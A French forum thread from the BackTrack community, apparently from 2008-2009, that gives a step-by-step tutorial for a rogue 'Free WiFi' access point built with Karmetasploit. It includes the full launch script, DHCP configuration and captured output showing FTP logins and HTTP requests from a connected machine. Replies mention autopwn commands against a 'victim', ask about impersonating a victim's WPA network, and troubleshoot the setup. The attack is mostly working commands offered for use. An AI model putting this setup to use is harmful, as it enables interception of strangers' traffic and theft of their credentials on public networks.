Forum BACKTRACK-FR

Nagual · 23-11-2008 17:31:24

Nous allons voir ici comment créer un faux AP afin de récupérer les données transitant par notre pc, une fois que quelqu'un s'y est connecté.

Il faut pour cela qu'aircrack et metasploit soient à jour. On peut tout updater depuis fastrack.

voici ma configuration pour cet exemple : 2 machines distinctes (NB = Notebook), un routeur, un fake AP donc PAS de vm.

+--------+ +--------+ +-------------+
| router +----rj45-----+ NB BT3 +-----------+ AP Alfa 500 +
+--------+ +--------+ +---+---------+
/|\
*
connection
*
|
+--------+ +-----------------+
+ NB XP +-------------+ Wifi Wus54gc +
+--------+ +-----------------+

1) création du script qui va lancer karmetasploit

Code:

bt Desktop # kedit karmetasploit.sh

contenu

Code:

#!/bin/bash

killall -9 dhcpd tcpdump airbase-ng

airmon-ng start wlan0
modprobe tun

airbase-ng -P -C 30 -c 7 -e "Free WiFi" -v wlan0 >/dev/null 2>&1 &
sleep 2
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0
sleep 2
ifconfig at0 mtu 1800
tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

Ne pas oublier de le rendre exécutable

Code:

bt Desktop # chmod +x karmetasploit.sh

Télécharger le ici : karmetasploit.sh

2) création du fichier dhcpd.conf

Code:

bt Desktop # kedit /pentest/exploits/framework3/dhcpd.conf

contenu

Code:

option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

Télécharger le ici : dhcpd.conf

3) Voila il ne nous reste plus qu'à lancer notre script

Code:

bt Desktop # ./karmetasploit.sh

les modules se loadent et le server démarre

4) on vérifie si notre fake AP est visible

5) Depuis notre poste windows, on lance notre wifi manager

6) et on se connecte sur le free WIFI

7) Regardons si on reçoit quelque chose sur notre server

8) Tout ce qui transite par notre machine est capturé est sauvegardé dans un fichier que nous pourrons exploiter.
Nous allons donc ouvir le fichier "/pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap" avec wireshark.

On constate que c'est bel et bien ce que l'on avait sur notre écran

Code:

[*] HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] DNS 10.0.0.254:49836 XID 42755 (IN::A wpad)
[*] HTTP wpad.dat sent to 10.0.0.254
[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
[*] DNS 10.0.0.254:62629 XID 21450 (IN::A www.symantec.com)
[*] DNS 10.0.0.254:57988 XID 17388 (IN::A liveupdate.symantecliveupdate.com)
[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantecliveupdate.com:80 GET /minitri.flg Unknown   cookies=
[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantecliveupdate.com:80 GET /livetri.zip Unknown   cookies=
[*] DNS 10.0.0.254:51388 XID 59332 (IN::A liveupdate.symantec.com)
[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantec.com:80 GET /minitri.flg Unknown   cookies=
[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantec.com:80 GET /livetri.zip Unknown   cookies=
[*] DNS 10.0.0.254:65278 XID 60765 (IN::A update.symantec.com)
[*] FTP LOGIN 10.0.0.254:1107 cust-r2 / xxxxxxx
[*] FTP LOGIN 10.0.0.254:1108 cust-r2 / xxxxxxx

LINKS: tuto avec explications et vidéos
http://bricowifi.free.fr/forums/viewtopic.php?id=101
http://bricowifi.blogspot.com/2008/09/t … ploit.html

yop · 23-11-2008 20:54:13

une fois les server lancés, et après que une victime se soit connecté, rentrez
help
vous aurez les commandes, genre (db_autopwn -e ; db_notes ...)

chrusse · 18-03-2009 22:17:35

merci pour le tuto , je vais tester ça la semaine prochaine ( hé oui manque de temps :s ) et je vous tient au courant. ;-)

celmar · 20-03-2009 20:21:56

je viens de tester sur mon pc en effet il y a bien les mots de passe de certains sites qui transites, mais les cookies comment les exploiter??

lilo · 28-04-2009 19:46:21

salut ca fonctionne sous bt4?

yop · 28-04-2009 20:15:57

faut modifier vite fait le script, une fois cela fait, ouai

lilo · 29-04-2009 16:42:38

comment le modifier car j'ai essayé avec le scripte actuelle mais ca fonctionne pas tu as une idée?

couky · 31-05-2009 15:32:42

Y aurait-il moyen de faire croire que notre Fake AP possède un cryptage Wep/Wpa ?

Comme ça on pourrait se faire passer pour l'AP de la victime, ensuite la victime se connecterait en rentrant sa key et notre AP la laisserait passé: On aurait la clé recherché du vrai AP sans la cracker !

airnare · 31-05-2009 18:44:38

bricowifi a écrit:

atheros avec hostapd (sous debian ect) (à modifier si vous voulez l'ouvrir car ici c'est en WPA)
/etc/network/interfaces :

Code:

auto ath0
iface ath0 inet static
    address 10.3.1.1
    netmask 255.255.0.0
    wireless-essid votre-essid
    wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf

/etc/wpa_supplicant/wpa_supplicant.conf :

Code:

network={
        ssid="votre-essid"
        #psk="votre-mot-de-passe"
        psk=fe2f5faa7b4f4d47f97ee4e70efa949976f06579ad8d2c1ea3991a7b46ea0a9e
}

/etc/dhcp3/dhcpd.conf :

Code:

ddns-update-style none;
option domain-name "tsgri2007.net";
#option domain-name-servers ns1.example.org, ns2.example.org;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wifi
subnet 10.3.0.0 netmask 255.255.0.0 {
    range 10.3.0.2 10.3.255.254;
    option domain-name-servers 10.3.1.1;
    #  option domain-name "internal.example.org";
    option routers 10.3.1.1;
    option broadcast-address 10.3.255.255;
    default-lease-time 600;
    max-lease-time 7200;
}

/etc/hostapd/hostapd.conf :

Code:

interface=ath0
driver=madwifi
logger_syslog=-1
logger_syslog_level=2
logger_stdout=--1
logger_stdout_level=2
debug=0
ctrl_interface_group=0
macaddr_acl=0
#deny_mac_file=/etc/hostapd/hostapd.deny
auth_algs=3
eapol_key_index_workaround=0
eap_server=0
dump_file=/tmp/hostapd.dump
ssid=SMH_WIFI
wpa=3
wpa_psk=fe2f5faa7b4f4d47f97ee4e70efa949976f06579ad8d2c1ea3991a7b46ea0a9e
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP

Le script de démarrage :

Code:

#!/bin/sh

#########################################################################
# Création de la carte ath0 et du point d'accès debian-access-point
echo "Création de la carte ath0 et du point d'accès debian-access-point";

ifconfig ath0 down;
wlanconfig ath0 destroy;
wlanconfig ath0 create wlandev wifi0 wlanmode ap nosbeacon;

echo "Veuillez patienter...";
sleep 1;
echo "Mise en place des options du point d'accès debian-access-point";
iwconfig ath0 key restricted;

echo "Veuillez patienter...";
sleep 2;
echo "Activation de ath0";
ifconfig ath0 10.3.1.1 up;
/usr/sbin/hostapd -B -P /var/run/hostapd.pid -dd -K -t /etc/hostapd/hostapd.conf;

ceci se trouve ici http://bricowifi.free.fr/forums/viewtopic.php?id=140

lolux60 · 31-05-2009 19:07:03

salut couky,
malhereusement en WPA on ne donne pas directement sa key, c'est un hash de la clé qui est échangé

couky · 01-06-2009 14:18:59

lolux60 a écrit:
salut couky,
malhereusement en WPA on ne donne pas directement sa key, c'est un hash de la clé qui est échangé

ok merci

orangade · 07-11-2009 22:20:18

Bonjour,

J'ai testé plusieurs fois la manip et suivi le tuto à la lettre (maj frameworks et aircrack-ng) sauf pour un point, je n'ai pas internet là ou j'effectue mes test.

+--------+ +-------------+
+ NB BT3 +-----------+ AP Alfa 500 +
+--------+ +---+---------+
/|\
*
connection
*
|
+--------+ +-----------------+
+ NB XP +-------------+ Zd1211 +
+--------+ +-----------------+

Voici ce qu'il se passe:
"ps: j'utilise une alfa500 awus36 rtl8187 qui me sert à me conecter, si j'utilise l'alfa pour attaque je n'ai plus accès au net"

1 avec mon 1er pc je crée sous bt3 le fake ap "tout se passe bien"

2 sur mon 2eme sous xp, la connexion "mord", j'ai bien l'ip du script fourni en dhcp par le pc bt3, l'essid est visible. L'icone wifi reseau xp est bleu et pas de connection limitée. Cependant je n'ai accès à aucune page web: pourtant j'ai meme essayé de changer les fichiers index.htm sous bt3.

3 Sur bt3, je vois bien les requetes faites par le pc xp. Si je tape une adresse dans l'explorer xp, karmetasploit me lis les requetes http.

Est ce du fait que je n'ai pas un accès au net pendant mon que je fait mon fake ap, que cela ne fonctionnes pas, et que le pc sous windows n'a pas accès sur la fake page?

Aussi, y'a t'il moyen de modifier le script pour palier ce problème, que mon fake ap renvoi ma page login sans accès au net?

Je vous remercie d'avance pour les réponses, et vous remercie pour le job accompli

++

Dernière modification par orangade (07-11-2009 22:28:08)

Sh4rk0 · 08-11-2009 00:07:34

Salut orangade.

Dans un premier temps, est ce que t as connection "réelle" est faite sur un hotspot? Car ayant essayé sur mon hotspot Neuf WiFi j'ai eu ce probleme (que je n'ai pas pu resoudre).

Ensuite afin que ta page login soit envoyée il existe un tres bon script appelait atxwpa que tu pourra trouver sur google permettant d'utiliser un meterpreter. En modifiant un peu le script, tu pourra envoyer ta page voulu.

Bon sur ceux, bonne nuit a bientot

ps : j'espere que le fait d'avoir cité un script ecrit d'une personne ne faisant pas parti du forum ne me portera pas prejudice.

Dernière modification par Sh4rk0 (08-11-2009 00:14:05)

orangade · 08-11-2009 13:33:59

Merci de ton aide.

Qu'appelle tu connexion réelle? La connection avec laquelle je me connecte en ce moment? Si oui, il s'agit d'une freebox. Je n'ai accès à cette connexion (étant loin de cet ap) qu'avec ma clé alfa. Je fait mon fake ap avec cette clé alfa, donc plus possible de l'utiliser en mode managed (connexion normale).

Le fait de ne pas avoir accès au web pourrai-il faire que je n'ai pas accès avec un autre pc a la page index du fake ap?

Je test avec tes infos et reviens ici pour faire suite.

MERCI Sh4rk0

Sh4rk0 · 08-11-2009 15:16:26

orangade a écrit:
Je n'ai accès à cette connexion (étant loin de cet ap) qu'avec ma clé alfa. Je fait mon fake ap avec cette clé alfa, donc plus possible de l'utiliser en mode managed (connexion normale).

Je pense que le probleme vient de la.
Afin de creer un fake AP il faut avoir au moins 2 carte : Une qui reste connectée en permanence, et une autre qui sert de Fake AP.

Disons que la carte1 est ton alfa500 et que tu est connecte avec sur ta freebox, alors avec la carte2 (ou dongle wifi) tu cree un FAKE AP(appelons le FreeAP).

Maintenant, depuis un autre pc tu doit voir ton AP FreeAP et, si tu te connecte dessus, tu accede au net par "l'intermediaire" de ton alfa.

Je ne sais pas si tu comprend le principe (j'ai du mal a expliquer).

Dis moi si tu vois ce que je veux dire

yop · 09-11-2009 05:19:56

non, pas besoin specialement de deux cartes

Sh4rk0 · 09-11-2009 14:30:23

Ok yop
Autant pour moi.
A plutard

Forum BACKTRACK-FR

Annonce

#1 23-11-2008 17:31:24

[tuTO] Fake AP avec karmetasploit

Code:

Code:

Code:

Code:

Code:

Code:

Code:

#2 23-11-2008 20:54:13

Re: [tuTO] Fake AP avec karmetasploit

#3 18-03-2009 22:17:35

Re: [tuTO] Fake AP avec karmetasploit

#4 20-03-2009 20:21:56

Re: [tuTO] Fake AP avec karmetasploit

#5 28-04-2009 19:46:21

Re: [tuTO] Fake AP avec karmetasploit

#6 28-04-2009 20:15:57

Re: [tuTO] Fake AP avec karmetasploit

#7 29-04-2009 16:42:38

Re: [tuTO] Fake AP avec karmetasploit

#8 31-05-2009 15:32:42

Re: [tuTO] Fake AP avec karmetasploit

#9 31-05-2009 18:44:38

Re: [tuTO] Fake AP avec karmetasploit

bricowifi a écrit:

Code:

Code:

Code:

Code:

Code:

#10 31-05-2009 19:07:03

Re: [tuTO] Fake AP avec karmetasploit

#11 01-06-2009 14:18:59

Re: [tuTO] Fake AP avec karmetasploit

lolux60 a écrit:

#12 07-11-2009 22:20:18

Re: [tuTO] Fake AP avec karmetasploit

#13 08-11-2009 00:07:34

Re: [tuTO] Fake AP avec karmetasploit

#14 08-11-2009 13:33:59

Re: [tuTO] Fake AP avec karmetasploit

#15 08-11-2009 15:16:26

Re: [tuTO] Fake AP avec karmetasploit

orangade a écrit:

#16 09-11-2009 05:19:56

Re: [tuTO] Fake AP avec karmetasploit

#17 09-11-2009 14:30:23

Re: [tuTO] Fake AP avec karmetasploit

Pied de page des forums